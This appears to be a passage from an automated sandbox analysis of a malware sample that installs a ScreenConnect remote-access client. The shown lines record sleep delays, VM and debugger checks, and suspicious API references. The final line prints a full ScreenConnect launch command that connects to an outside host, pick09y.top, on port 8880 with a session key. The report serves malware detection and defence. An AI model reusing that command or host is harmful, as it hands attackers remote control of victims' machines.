                  Source: C:\Users\user\Desktop\pzPO97QouM.exe TID: 7444Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -599652s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -599516s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -599394s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -598625s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -598293s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -598172s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -598061s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597939s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597800s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597547s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597421s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597311s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597202s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597094s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596984s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596546s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596327s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596210s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595917s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595806s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595666s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595547s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595327s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594891s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594766s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594641s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594531s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594421s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594203s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594094s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593984s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593874s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593766s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593641s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593516s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593361s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593182s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593069s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -592928s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -592797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -592687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -592577s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 7764Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe TID: 2656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe TID: 1636Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C4A4B FindFirstFileExA,0_2_009C4A4B
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599652Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599394Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598293Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598061Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597939Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597800Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597311Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597202Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596327Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596210Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595917Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595806Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595666Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595327Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593361Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593182Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593069Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592928Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592577Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: Amcache.hve.6.drBinary or memory string: VMware
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.2245876378.0000016768828000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2244765941.00000167686C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2595636631.000002EA7902B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2596981400.000002EA7E641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2597052281.000002EA7E654000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594952683.000002001D0D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: dfsvc.exe, 00000001.00000002.2242687962.0000016766749000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.2594330340.0000000000F0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: svchost.exe, 00000008.00000002.2594566603.000002001D03D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: svchost.exe, 00000008.00000002.2595477031.000002001DE5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                  Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009C191F
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009C1000
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C3677 mov eax, dword ptr fs:[00000030h]0_2_009C3677
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C6893 GetProcessHeap,0_2_009C6893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009C1493
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009C191F
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009C4573
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C1AAC SetUnhandledExceptionFilter,0_2_009C1AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: ScreenConnect.ClientService.dll.1.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7440 -ip 7440Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 756Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"Jump to behavior
